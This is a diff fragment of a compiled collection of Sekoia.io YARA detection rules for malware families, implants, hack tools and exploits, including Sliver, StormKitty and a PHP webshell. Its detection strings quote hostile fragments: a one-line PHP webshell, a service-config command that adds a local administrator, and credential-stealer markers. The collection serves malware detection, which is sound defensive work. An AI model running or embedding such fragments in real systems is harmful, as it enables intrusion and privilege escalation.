+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_exploit_comahawk_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_wolfsbane_backdoor.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a80fed3fd64562dd3e2fa197ca3d2aaf8e33783729b725c71f7eb8931af70d82"
+		hash = "1418fe9a743226b9661a2b6decb19db0"
+		logic_hash = "97d5076ca4c204a2e2276fd250d64bc140da1f2c8dec9996db7a622385f2c0ac"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253529,56 +253557,74 @@ rule SEKOIA_Tool_Exploit_Comahawk_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sc config UsoSvc binpath=" wide
-		$ = "binpath= \"cmd.exe /c net localgroup administrators /add"
-		$ = "[+] Command executed."
-		$ = "Release\\COMahawk.pdb"
-		$ = " is added as an admin."
+		$ = "udp_session"
+		$ = "session_interface"
+		$ = "plugin_persist"
+		$ = "Udp.cpp"
+		$ = "ikcp.c"
+		$ = "' %s 2>/dev/null"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize > 3MB and filesize < 4MB and 4 of them
 }
-rule SEKOIA_Apt_Tealkurma_Snappytcp_Reverse_Shell_Strings : FILE
+rule SEKOIA_Loader_Win_Operationmagalenha_Vbs
 {
 	meta:
-		description = "Detects TealKurma SnappyTCP reverse shell"
+		description = "Finds VBS file loading the PeepingTitle backdoor"
 		author = "Sekoia.io"
-		id = "e842825c-546c-475a-bc94-7e97aea4e9e0"
-		date = "2023-12-08"
+		id = "b1f705d1-de3e-4ce6-9bb7-0e39b6e79add"
+		date = "2023-05-31"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tealkurma_snappytcp_reverse_shell_strings.yar#L1-L21"
+		reference = "https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_operationmagalenha_vbs.yar#L1-L39"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "feb24cafcf5b080c91dab42bf8d78fbdb0b7fae9395c7513f02aa90a25663d2c"
+		logic_hash = "bb1c48ea6a4d9f0bc04df558837f2d448b38eac920cb4030e01b915a4e442708"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 78
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "2>&1>/dev/null&" ascii
-		$ = ".php HTTP/1.1" ascii
-		$ = "GET /" ascii
-		$ = "Hostname: %s" ascii
-		$ = "bash -c \"./" ascii
+		$str01 = "'Skip to content" ascii
+		$str02 = "'Search" ascii
+		$str03 = "'Sign in" ascii
+		$str04 = "'Sign up" ascii
+		$str05 = "'Code" ascii
+		$str06 = "'Terms" ascii
+		$str07 = "'Privacy" ascii
+		$str08 = "'Security" ascii
+		$str09 = "'Status" ascii
+		$str10 = "'Docs" ascii
+		$str11 = "'Contact GitHub" ascii
+		$str12 = "'Pricing" ascii
+		$str13 = "'API" ascii
+		$str14 = "'Training" ascii
+		$str15 = "'Blog" ascii
+		$str16 = "'About" ascii
+		$vbs01 = "WScript.Sleep" ascii nocase
+		$vbs02 = "Set obj" ascii nocase
+		$vbs03 = "Dim obj" ascii nocase
+		$vbs04 = "https://tinyurl.com" ascii nocase
+		$vbs05 = "C:\\Users\\Public" ascii nocase
+		$vbs06 = "CreateObject(\"WScript.Shell\")" ascii nocase
+		$vbs07 = ".SaveToFile" ascii nocase
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 3MB and 3 of them
+		10 of ( $str* ) and 5 of ( $vbs* )
 }
-
-rule SEKOIA_Apt_Mustang_Panda_Toneshell : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_10 : FILE
 {
 	meta:
-		description = "Detect the TONESHELL implant used by Mustang Panda from specific functions"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "bf7c68a9-dddc-494a-a603-c2311ed712a4"
-		date = "2022-11-28"
+		id = "477f8b92-e231-460c-8660-487d0a97f0e2"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustang_panda_toneshell.yar#L4-L160"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_10.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "192fb01817cc6361062999cf539c51616d1755a5cd8e9d6e37bee6f6d04b0721"
+		logic_hash = "6ded3f5b7e9c7f2c09e3bc0869e41775e4bb31a39e6fef8209f50f5091e8d2e2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253586,152 +253632,83 @@ rule SEKOIA_Apt_Mustang_Panda_Toneshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$func1 = {
-        55
-        89 E5
-        64 A1 18 00 00 00
-        A3 ?? ?? ?? ??
-        5D
-        C3
-        }
-		$func2 = {
-        55
-        89 E5
-        50
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        89 45 ??
-        8B 45 ??
-        89 C1
-        83 C1 FF
-        89 4D ??
-        83 F8 00
-        0F 84 ?? ?? ?? ??
-        8B 45 ??
-        8A 08
-        8B 45 ??
-        88 08
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        E9 ?? ?? ?? ??
-        8B 45 ??
-        83 C4 04
-        5D
-        C3
-        }
-		$decryption_routine1 = {
-        8B 45 ??
-        C7 45 ?? 00 00 00 00
-        83 7D ?? 20
-        0F 8D ?? ?? ?? ??
-        8B 45 ??
-        8B 4D ??
-        0F BE 04 08
-        83 F0 ??
-        88 C2
-        8B 45 ??
-        8B 4D ??
-        88 14 08
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        E9 ?? ?? ?? ??
-        83 C4 04
-        }
-		$decryption_routine2 = {
-        55
-        89 E5
-        83 EC 08
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        8B 45 ??
-        C7 45 ?? 00 00 00 00
-        C7 45 ?? 00 00 00 00
-        8B 45 ??
-        3B 45 ??
-        0F 8D ?? ?? ?? ??
-        8B 45 ??
-        8B 4D ??
-        0F BE 04 08
-        8B 4D ??
-        8B 55 ??
-        0F BE 0C 11
-        31 C8
-        88 C2
-        8B 45 ??
-        8B 4D ??
-        88 14 08
-        8B 45 ??
-        8B 4D ??
-        83 E9 01
-        39 C8
-        0F 85 ?? ?? ?? ??
-        C7 45 ?? 00 00 00 00
-        E9 ?? ?? ?? ??
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        8B 45 ??
-        83 C0 01
-        89 45 ??
-        E9 ?? ?? ?? ??
-        83 C4 08
-        5D
-        C3
-        }
+		$ = "length = enc.GetByteCount_2(b);"
+		$ = "ms.Write(ba, 0, (length / 4) * 3);"
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
+
+	condition:
+		all of them and filesize < 2MB
+}
+rule SEKOIA_Hacktool_Fscan_Strings : FILE
+{
+	meta:
+		description = "Detects fscan based on strings"
+		author = "Sekoia.io"
+		id = "6bef80c3-370c-4168-9d88-3fac88f986b1"
+		date = "2023-12-06"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_fscan_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "b1c88af2f90921fab4ac32ef65e226a652b8df2915abc62de0a28af9ad59811c"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	strings:
+		$ = "Plugins.RdpScan.func1"
+		$ = "Plugins.smb1AnonymousConnectIPC.func1"
+		$ = "WebScan/WebScan.go"
+		$ = "Plugins/CVE-2020-0796.go"
+		$ = "Plugins.SshConn.func4"
+		$ = "Plugins.PostgresScan"
+		$ = "Plugins.(*FCGIClient).Request.func1"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 8MB and for all i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) != "69f400d3ff4679294e63fb8a8ca97dbb" ) and 3 of them and true
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 30MB and 4 of them
 }
-rule SEKOIA_Apt_Gelsemium_Wolfsbane_Backdoor : FILE
+rule SEKOIA_Implant_Any_Sliver : FILE
 {
 	meta:
-		description = "Detects Gelsemium's WolfsBane backdoor"
+		description = "Rule which detects any Sliver implant PE/Dlls/ELFs/MAC-O."
 		author = "Sekoia.io"
-		id = "db2ad5a4-b592-4646-a385-c668bb2ea090"
-		date = "2024-11-22"
+		id = "4b16f28a-2048-4044-8620-8e7a1651f2b1"
+		date = "2021-11-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_wolfsbane_backdoor.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_any_sliver.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "1418fe9a743226b9661a2b6decb19db0"
-		logic_hash = "97d5076ca4c204a2e2276fd250d64bc140da1f2c8dec9996db7a622385f2c0ac"
+		logic_hash = "c7a2790fd13de0476cfe16ef26b2d4c8775f4f453d076c78975e2c372f03322c"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "udp_session"
-		$ = "session_interface"
-		$ = "plugin_persist"
-		$ = "Udp.cpp"
-		$ = "ikcp.c"
-		$ = "' %s 2>/dev/null"
+		$s1 = ").GetActiveC2" ascii
+		$s2 = ").GetVersion" ascii
+		$s3 = ").GetReconnectInterval" ascii
+		$s4 = ").GetProxyURL" ascii
+		$s5 = ").GetPollInterval" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize > 3MB and filesize < 4MB and 4 of them
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and ( true and filesize < 11MB and filesize > 7MB ) and ( all of ( $s* ) )
 }
-rule SEKOIA_Backdoor_Opensource_Northstar_Strings : FILE
+rule SEKOIA_Apt_Ta410_Driver_Keylogger : FILE
 {
 	meta:
-		description = "Detects the NorthStar Backdoor strings"
+		description = "Keylogger TA410"
 		author = "Sekoia.io"
-		id = "6bf2f428-ec1a-4115-9c5e-258e9176969a"
-		date = "2022-08-23"
+		id = "0cba1b3b-b93e-41e3-a7df-afd306e6b519"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_opensource_northstar_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta410_driver_keylogger.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c4cf8935137c1420106807240de7583ca8f5c0b231f51bba279aedf672e25274"
+		logic_hash = "5ed152cc068f194cb7bf8c34744f0f1ebd4f621e6ae47f14bab64b18d94af4c5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253739,28 +253716,30 @@ rule SEKOIA_Backdoor_Opensource_Northstar_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "_SAMDUMP.zip" wide
-		$ = "northstar" wide
-		$ = "smanage.php?sid=" wide
-		$ = "File Not Exists" wide
-		$ = "<enablecmd or enable cmd>" wide
-		$ = "getjuice.php" wide
+		$ = "namedpipe_keymousespy" ascii wide
+		$ = "[`LCTRL]" ascii wide
+		$ = "[`RCTRL]" ascii wide
+		$ = "[`BREAK]" ascii wide
+		$ = "[`NUMLOCK]" ascii wide
+		$ = "[`L]" ascii wide
+		$ = "[`R]" ascii wide
+		$ = "[`M]" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Mustangpanda_Decrypt_Payload : FILE
+rule SEKOIA_Apt_Luckymouse_Rshell_Strings : FILE
 {
 	meta:
-		description = "Detects the decryption routine of DAT file"
+		description = "Detects LuckyMouse RShell Mach-O implant"
 		author = "Sekoia.io"
-		id = "7b954007-0929-454d-8a10-05279a337f1b"
-		date = "2022-12-08"
+		id = "89f18013-ea3e-440f-821e-cef102a43b7b"
+		date = "2022-08-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_decrypt_payload.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_rshell_strings.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dcc32580e351e605d21dc29558764c6fd85f8a9506de8e78f301459a5a2610b7"
+		logic_hash = "ffca47856d4c4d83312220cff23c0a556be0e675d59ac009c2f74fc0e39cb816"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253768,35 +253747,32 @@ rule SEKOIA_Apt_Mustangpanda_Decrypt_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        85 ??
-        74 ??
-        8B ??
-        D1 EA
-        A1 ?? ?? ?? ??
-        03 C2
-        A3 ?? ?? ?? ??
-        30 04 29
-        41
-        3B ??
-        72 EC
-        }
+		$ = { 64 69 72 00 70 61 74 68
+        00 64 6F 77 6E 00 72 65
+        61 64 00 75 70 6C 6F 61
+        64 00 77 72 69 74 65 00
+        64 65 6C }
+		$ = { 6C 6F 67 69 6E 00 68 6F
+        73 74 6E 61 6D 65 00 6C
+        61 6E 00 75 73 65 72 6E
+        61 6D 65 00 76 65 72 73
+        69 6F 6E }
 
 	condition:
-		filesize < 8MB and all of them
+		( uint32be( 0 ) == 0xCFFAEDFE or uint16be( 0 ) == 0x4d5a ) and filesize < 300KB and all of them
 }
-rule SEKOIA_Tool_Win_Sharpshares : FILE
+rule SEKOIA_Exploit_Linux_Eop_Polkit_Pkexec_Strings : FILE
 {
 	meta:
-		description = "Finds sharpshares EXE based on strings"
+		description = "Detects Polkit Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "ef90d573-12f8-4216-9a9e-96e7d1e841d0"
-		date = "2024-06-10"
+		id = "de45c29e-432a-4e4f-b700-a016341d56d2"
+		date = "2023-12-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/mitchmoser/SharpShares/releases"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_sharpshares.yar#L1-L26"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_polkit_pkexec_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6aa96d7c24638451bde98497cc7c844c87612d81cc7826113729c80bd5180442"
+		logic_hash = "42d04204481c165ba1b5c4ee5ff1094c31400669b0eca041d736473d481e74b7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253804,33 +253780,25 @@ rule SEKOIA_Tool_Win_Sharpshares : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "<GetAllShares>b__0" ascii
-		$str02 = "<SearchLDAP>b__0_0" ascii
-		$str03 = "get_AccessControlType" ascii
-		$str04 = "get_IdentityReference" ascii
-		$str05 = "get_PropertiesToLoad" ascii
-		$str06 = "SharpShares\\obj\\Release\\SharpShares.pdb" ascii
-		$str07 = "/filter:SYSVOL,NETLOGON,IPC$,PRINT$" wide
-		$str08 = "/threads:50 /ldap:servers" wide
-		$str09 = "SharpShares.exe" ascii wide
-		$str10 = "[+] LDAP Search Results:" wide
-		$str11 = "[+] Finished Enumerating Shares" wide
+		$ = "[.] Spawning suid process (%s) ..."
+		$ = "[.] Tracing midpid ..."
+		$ = "PTRACE_TRACEME local root (CVE-2019-13272)"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Doc_External_Template : FILE
+rule SEKOIA_Infostealer_Win_Stormkitty : FILE
 {
 	meta:
-		description = "Detects malicious templates used by Gamaredon"
+		description = "Finds StormKitty samples (or their variants) based on specific strings"
 		author = "Sekoia.io"
-		id = "5f6bbf92-2fdf-428d-af49-2d3e754c29d7"
-		date = "2023-01-23"
+		id = "5014d2e5-af5c-4800-ab1e-b57de37a2450"
+		date = "2023-03-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_doc_external_template.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stormkitty.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "51412081fa7e62fa342b0ed6da18009b39e3952286f2bd319fbe10e0b1761e02"
+		logic_hash = "57a4603faf6af9742db79f9bc8751f3a5c091b6271998434f0a3b9f5c30cb1e8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253838,25 +253806,38 @@ rule SEKOIA_Apt_Gamaredon_Doc_External_Template : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "USERPROFILE" ascii
-		$ = "msxml2" ascii
-		$ = "T24gRXJyb3IgUmVzdW1lIE5leHQ" ascii
+		$sk01 = "LimerBoy/StormKitty" ascii wide
+		$sk02 = "StormKitty-Latest.log" wide
+		$sk03 = "StormKitty.exe" ascii
+		$sk04 = "Debug\\StormKitty.pdb" ascii
+		$sk05 = "StormKitty.Implant" ascii
+		$str01 = "set_sUsername" ascii
+		$str02 = "set_sIsSecure" ascii
+		$str03 = "set_sExpMonth" ascii
+		$str04 = "WritePasswords" ascii
+		$str05 = "WriteCookies" ascii
+		$str06 = "sChromiumPswPaths" ascii
+		$str07 = "sGeckoBrowserPaths" ascii
+		$str08 = "Username: {1}" wide
+		$str09 = "Password: {2}" wide
+		$str10 = "encrypted_key\":\"(.*?)\"" wide
 
 	condition:
-		uint32be( 0 ) == 0xd0cf11e0 and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $sk* ) and 3 of ( $str* ) ) or 7 of ( $str* ) )
 }
-rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Smtp : FILE
+
+rule SEKOIA_Backdoor_Win_Andardoor : FILE
 {
 	meta:
-		description = "Detects SUGARDUMP SMTP version"
+		description = "Detect the Andardoor backdoor used by Andariel"
 		author = "Sekoia.io"
-		id = "bf028ebc-bfaa-45b3-9a3f-8949a5efbb73"
-		date = "2022-08-23"
+		id = "27f28f6e-b8fd-41dc-88a8-92f5a125a807"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sugardump_credentials_stealer_smtp.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_andardoor.yar#L4-L34"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1f423f38ff323e67667e35af5603e608cba6eaf8d98633467b0292c5f81c8d1c"
+		logic_hash = "631836634222f4e081d3070c92150a4e14f06bcdd462fbfdf0756aa1f2661b59"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253864,26 +253845,28 @@ rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Smtp : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<<<<<<<< ------ Passwords Total: {0} --------- >>>>>>>>" wide
-		$ = "Url = {0} , Count = {1}" wide
-		$ = "smtp." wide
-		$ = "encrypted_key\":\"(.*?)\"" wide
+		$ = " : Deleted Dir" wide
+		$ = " : Not Exists" wide
+		$ = " : Deleted File" wide
+		$ = " : Closed." wide
+		$ = " : Opened." wide
+		$ = "GoodLuck!" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9fea4972270c492ca304f3663913ae63" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "34fde27c3c864efa6225e72016992d341f29cbbea638432a1c63ce05ca568300" )
 }
-rule SEKOIA_Apt_Badmagic_Reco_Pshscript : FILE
+rule SEKOIA_Hacktool_Mimilite : FILE
 {
 	meta:
-		description = "Detects BadMagic Reco powershell script"
+		description = "Detects Mimilite"
 		author = "Sekoia.io"
-		id = "7a1b2d31-03b7-4a43-8f4e-ed38ba8e118e"
-		date = "2023-05-15"
+		id = "abb92a9d-0978-4ef2-b2cc-53ce6e83e3e4"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_reco_pshscript.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_mimilite.yar#L1-L37"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "86369267545241f33c6fc7dab11eb06f71641d8e9cd0365ddcc676d4f4c9739b"
+		logic_hash = "504bc58e1c4143cc2322d564b637b0e014a4ead44f56a75fe1202b0d0a2e8bbc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253891,26 +253874,43 @@ rule SEKOIA_Apt_Badmagic_Reco_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$headers = @{};"
-		$ = "==ARP Cache=="
-		$ = "ipconfig.me"
-		$ = "-ComputerName $env:computername;"
+		$chunk = {
+        FF C7
+        48 63 D7
+        46 0F B6 04 22
+        41 03 F0
+        81 E6 ?? ?? ?? ??
+        7D ??
+        FF CE
+        81 CE ?? ?? ?? ??
+        FF C6
+        48 63 CE
+        42 0F B6 04 21
+        42 88 04 22
+        46 88 04 21 }
+		$imp1 = "CryptGetHashParam"
+		$imp2 = "CryptDestroyHash"
+		$imp3 = "CryptHashData"
+		$imp4 = "CryptReleaseContext"
+		$imp5 = "CryptCreateHash"
+		$imp6 = "CryptAcquireContextA"
+		$imp7 = "VirtualAlloc"
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $imp* ) and $chunk
 }
-rule SEKOIA_Apt_Cloudatlas_Powertunnel : FILE
+rule SEKOIA_Generic_Php_Webshell : FILE
 {
 	meta:
-		description = "Detects PowerTunnel DLL of CloudAtlas"
+		description = "Detects generic webshell"
 		author = "Sekoia.io"
-		id = "04981493-de8b-4662-ae81-8866c182f8b2"
-		date = "2022-11-29"
+		id = "415a96bd-11a4-40e7-8335-ac1f1a99d17c"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powertunnel.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_php_webshell.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "aadb2739957d17c7e82e3abf7a178ab7b6e4a598fbbdb1a06d0c0531656d4ef6"
+		logic_hash = "617264a785b8e9e87a39e12d7b72963d94e0686a174716347369fe71ab7a78af"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253918,27 +253918,23 @@ rule SEKOIA_Apt_Cloudatlas_Powertunnel : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "BeginGetHostEntry"
-		$ = "get_AddressList"
-		$ = "time_stop_delay_seconds"
-		$ = "<connect><result>{0}</result></connect>"
-		$ = "_CorDllMain"
+		$ = "system($_POST['a']);"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		all of them and filesize < 500
 }
-rule SEKOIA_Apt_Andariel_Keylogger_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Generic_Pshscript : FILE
 {
 	meta:
-		description = "Detects one of the Andariel keylogger"
+		description = "Detects BadMagic generic powershell script (Possible FPs)"
 		author = "Sekoia.io"
-		id = "59e94bee-9bd4-4f72-9358-858956bb4787"
-		date = "2024-06-17"
+		id = "82cda554-3c2b-4c04-b9f9-b5ba50c53271"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_keylogger_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_generic_pshscript.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "671698af4fbaed3d19f3d3498263183909db9422a5a0a8f12ba119409773c505"
+		logic_hash = "f442e1ba815cc7eae0c627db5ad1917021d69b8ce37155923a0f19776aeba95d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253946,78 +253942,106 @@ rule SEKOIA_Apt_Andariel_Keylogger_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Username:%s [%d/%02d/%02d %02d:%02d]" ascii fullword
-		$ = "-------[%d/%02d/%02d %02d:%02d]"
-		$ = "{Insert}"
+		$ = "$ExecutablePath"
+		$ = "Start-Sleep -Second 2"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 2 of them
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Tool_Yasso_Strings : FILE
+rule SEKOIA_Gen_Empire_Onedrive_Stager
 {
 	meta:
-		description = "Detects Yasso based on strings"
+		description = "Detects the Empire OneDrive stager"
 		author = "Sekoia.io"
-		id = "31ec7510-6770-4fde-b835-e8b12f8f2b30"
-		date = "2023-06-21"
+		id = "2053416f-1f53-491e-9c70-787a04362d16"
+		date = "2022-01-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_yasso_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/gen_empire_onedrive_stager.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
